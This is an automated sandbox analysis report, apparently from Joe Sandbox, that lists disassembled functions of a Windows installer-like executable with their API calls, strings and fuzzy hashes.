                                                                          Function 00422DC0 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCapture.USER32 ref: 00422E14
                                                                          • GetCapture.USER32 ref: 00422E23
                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E29
                                                                          • ReleaseCapture.USER32 ref: 00422E2E
                                                                          • GetActiveWindow.USER32 ref: 00422E3D
                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EBC
                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F20
                                                                          • GetActiveWindow.USER32 ref: 00422F2F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                          • String ID:
                                                                          • API String ID: 862346643-0
                                                                          • Opcode ID: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                          • Instruction ID: 6da1d0135b9d11ce9028ca126f5481e792b9d420ac57a31bdf33f6cc8c40a84a
                                                                          • Opcode Fuzzy Hash: 712e39948fd123bd0944784c1e4209bda02e8cd1285bd6ba2bce8578b7203805
                                                                          • Instruction Fuzzy Hash: 83414370B00254AFDB10EBA9DA46B9D77F1EF45304F5540BAF404AB3A2D7B89E41DB18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004293F0 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000), ref: 004293FA
                                                                          • GetTextMetricsA.GDI32(00000000), ref: 00429403
                                                                            • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00429412
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 0042941F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00429426
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042942E
                                                                          • GetSystemMetrics.USER32(00000006), ref: 00429453
                                                                          • GetSystemMetrics.USER32(00000006), ref: 0042946D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 361401722-0
                                                                          • Opcode ID: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                          • Instruction ID: 2396e8ac942ab906a208d8077257e147ebb5126c2b98df3f18c4b625c9a01c14
                                                                          • Opcode Fuzzy Hash: b2aa10e7b7089fe9610b7b0ad8d25b91e96a29c2a8d1cae1ffdab2385f8086cd
                                                                          • Instruction Fuzzy Hash: 3D0104917087103BF710B2B69CC2F6B6188DB9435DF44013FFA469A3D3D56C8C45866A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041DD94 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,00418FC9,0049295D), ref: 0041DD97
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDA1
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00418FC9,0049295D), ref: 0041DDAE
                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DDBD
                                                                          • GetStockObject.GDI32(00000007), ref: 0041DDCB
                                                                          • GetStockObject.GDI32(00000005), ref: 0041DDD7
                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DDE3
                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DDF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                                          • String ID:
                                                                          • API String ID: 3573811560-0
                                                                          • Opcode ID: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                          • Instruction ID: 26d2215c38f7902349b80dbd4a09bdf013e3c627cae683e10812a8645452cf50
                                                                          • Opcode Fuzzy Hash: a00a97ecbf7073f89d6e04e837562f06262f280598315b13768e927efd87297b
                                                                          • Instruction Fuzzy Hash: 381160B06403415AE700BF659892FA63790DBA5709F00813FF208AF2D2CB7E0C058B5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045F740 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0045F844
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0045F8D9), ref: 0045F84A
                                                                          • SetCursor.USER32(?,0045F8C1,00007F02,00000000,0045F8D9), ref: 0045F8B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID: $ $Internal error: Item already expanding
                                                                          • API String ID: 1675784387-1948079669
                                                                          • Opcode ID: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                          • Instruction ID: bc19f93f64f4cfd3b6c64fbb5e4444054adc2e78d3f14390eea5280ae24d604a
                                                                          • Opcode Fuzzy Hash: 374c6eee6dd7c05d3ed29aecb3c07f8607bfbe119cdd536ef1ba66e3ece505ba
                                                                          • Instruction Fuzzy Hash: BAB16B34A006449FDB10DF69C585B9ABBF5AF04305F2484BAEC499B793C778AD4CCB1A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00452590 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00452677
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                          • API String ID: 390214022-3304407042
                                                                          • Opcode ID: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                          • Instruction ID: abf6614f95991f047cbf872b8675d76fa93f36fd66684b0017750e1831af6413
                                                                          • Opcode Fuzzy Hash: 17577b0f8582e5cf7f857e8520d0c40de0327dd1c60d8c6587b1496694d50cfd
                                                                          • Instruction Fuzzy Hash: DB910174A002099BDF01EFA5D942BDEB7B5AF49305F50816BE800B7396D7B85E09CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004549F8 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 178COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 756FE550.OLE32(00493A3C,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A34
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • 756FE550.OLE32(00493764,00000000,00000001,00493774,?,00000000,00454BEE), ref: 00454A58
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00454BB3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: E550String$AllocByteCharFreeMultiWide
                                                                          • String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
                                                                          • API String ID: 2757340368-615220198
                                                                          • Opcode ID: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                          • Instruction ID: e28da0ffaceb01cee804717922773e9a91ffd05ea7c596c2a735a488419d39cb
                                                                          • Opcode Fuzzy Hash: 10b61ca11c913b85dd018bfca0bd87c493ce64892769d21c1277a1ff95bb23bd
                                                                          • Instruction Fuzzy Hash: 14513371A40105AFDB40DFA9C885F9E7BF8EF4970AF014066B904EB252DB78ED48CB19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00408688 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004088D0,?,?,?,?,00000000,00000000,00000000,?,004098D7,00000000,004098EA), ref: 004086A2
                                                                            • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                            • Part of subcall function 0040851C: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040871E,?,?,?,00000000,004088D0), ref: 0040852F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                          • Instruction ID: bc7079e0a6f451a0b148bd409c2e0f1595c2818476049878c3843938bdef3741
                                                                          • Opcode Fuzzy Hash: 9362ec8491f342d5e9289923679bf7722b3cc2aaffa74b6a8b68c84bdd1720ec
                                                                          • Instruction Fuzzy Hash: EB514B34B002486BDB00FAA6C941B9F77A9DB94308F50D47FA141BB3C6CA3DCA06971D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00411664 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00000000,00411869), ref: 004116FC
                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 004117BA
                                                                            • Part of subcall function 00411A1C: CreatePopupMenu.USER32 ref: 00411A36
                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411846
                                                                            • Part of subcall function 00411A1C: CreateMenu.USER32 ref: 00411A40
                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0041182D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                          • String ID: ,$?
                                                                          • API String ID: 2359071979-2308483597
                                                                          • Opcode ID: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                          • Instruction ID: 4e4ae47f8a98248c410fe7f22b452c6d5eef6af5e50a3601a7d5a52227d6b5a7
                                                                          • Opcode Fuzzy Hash: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                          • Instruction Fuzzy Hash: 91510774A00141ABDB10EF6ADC816DA7BF9AF09304B1585BBF904E73A6D738DE41CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041BDD3 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BE98
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BEA7
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BEF8
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF06
                                                                          • DeleteObject.GDI32(?), ref: 0041BF0F
                                                                          • DeleteObject.GDI32(?), ref: 0041BF18
                                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BF35
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                          • String ID:
                                                                          • API String ID: 1030595962-0
                                                                          • Opcode ID: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                          • Instruction ID: df24cebc7fa487ee98114de19092ccc5a22b1f53c044ef6357ba81a281e40f4e
                                                                          • Opcode Fuzzy Hash: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                          • Instruction Fuzzy Hash: A4510571E00219AFCB14DFA9D8819EEB7F9EF48314B10446AF914E7391D738AD81CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041CE48 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CE6E
                                                                          • 73A24620.GDI32(00000000,00000026), ref: 0041CE8D
                                                                          • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CEF3
                                                                          • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF02
                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CF6C
                                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041CFAA
                                                                          • 73A18830.GDI32(?,?,00000001,0041CFDC,00000000,00000026), ref: 0041CFCF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Stretch$A18830$A122A24620BitsMode
                                                                          • String ID:
                                                                          • API String ID: 430401518-0
                                                                          • Opcode ID: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                          • Instruction ID: 0295d75a013be80ecc2d975aeb153abe1d20fbb24d7cab5e263b7fb8805ed029
                                                                          • Opcode Fuzzy Hash: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                          • Instruction Fuzzy Hash: 6A512970644600AFDB14DFA8C985FABBBF9AF08304F10459AF544DB292C778ED80CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00455190 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,?,?), ref: 004551E2
                                                                            • Part of subcall function 004241EC: GetWindowTextA.USER32(?,?,00000100), ref: 0042420C
                                                                            • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                            • Part of subcall function 0041EE14: 73A25940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                            • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00455249
                                                                          • TranslateMessage.USER32(?), ref: 00455267
                                                                          • DispatchMessageA.USER32(?), ref: 00455270
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                          • String ID: [Paused]
                                                                          • API String ID: 3047529653-4230553315
                                                                          • Opcode ID: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                          • Instruction ID: f2f6b487c86353f72898e4c8af60e590ce20add486516cec5e8e630063df4c80
                                                                          • Opcode Fuzzy Hash: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                          • Instruction Fuzzy Hash: 5731C3319086486ECB01DBB5DC51FEEBBB8EB49314F5140B7F800E3692D67C990ACB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004671DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursor.USER32(00000000,0046731B), ref: 00467298
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004672A6
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046731B), ref: 004672AC
                                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672B6
                                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LoadSleep
                                                                          • String ID: CheckPassword
                                                                          • API String ID: 4023313301-1302249611
                                                                          • Opcode ID: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                          • Instruction ID: e79c91264cf403656a7ecb179e9d02605dd9e3cded0af3c011d04f8f5d04b07e
                                                                          • Opcode Fuzzy Hash: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                          • Instruction Fuzzy Hash: A1318134644644AFD711EF69C88AF9A7BE4AF45308F5580B6FC00AF3A2DB789D40DB49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00457AD8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00457B93
                                                                          Strings
                                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00457BB6
                                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00457B9E
                                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00457B78
                                                                          • CreateAssemblyCache, xrefs: 00457B8A
                                                                          • Fusion.dll, xrefs: 00457B33
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                          • API String ID: 190572456-3990135632
                                                                          • Opcode ID: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                          • Instruction ID: 54d6081f599df52c860fdc2f47534742524e01ae44f48fc011e119f3f1d07f73
                                                                          • Opcode Fuzzy Hash: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                          • Instruction Fuzzy Hash: FA319A71E04609AFCB11EFA5D88169FB7B8EF44315F50857BE814E7382D7389E088B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041C0B8 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041BFB8: GetObjectA.GDI32(?,00000018), ref: 0041BFC5
                                                                          • GetFocus.USER32 ref: 0041C0D8
                                                                          • 73A1A570.USER32(?), ref: 0041C0E4
                                                                          • 73A18830.GDI32(?,?,00000000,00000000,0041C163,?,?), ref: 0041C105
                                                                          • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C163,?,?), ref: 0041C111
                                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C128
                                                                          • 73A18830.GDI32(?,00000000,00000000,0041C16A,?,?), ref: 0041C150
                                                                          • 73A1A480.USER32(?,?,0041C16A,?,?), ref: 0041C15D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A480A570BitsFocusObject
                                                                          • String ID:
                                                                          • API String ID: 2231653193-0
                                                                          • Opcode ID: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
                                                                          • Instruction ID: be6d8328aec04e85a436dd0cf8ae2147a44d9b66c6d411dca3268b31211d8f12
                                                                          • Opcode Fuzzy Hash: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
                                                                          • Instruction Fuzzy Hash: B2116A71A40618BFDB10DBA9CC86FAFB7FCEF48700F54446AB514E7281D6789D008B68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047DE80 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0047DF38), ref: 0047DF1D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                          • API String ID: 47109696-2530820420
                                                                          • Opcode ID: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
                                                                          • Instruction ID: 7da821122e4f9b7c3381c3a81ebb3182cabfb864ff3682cb6973b5219dc9143e
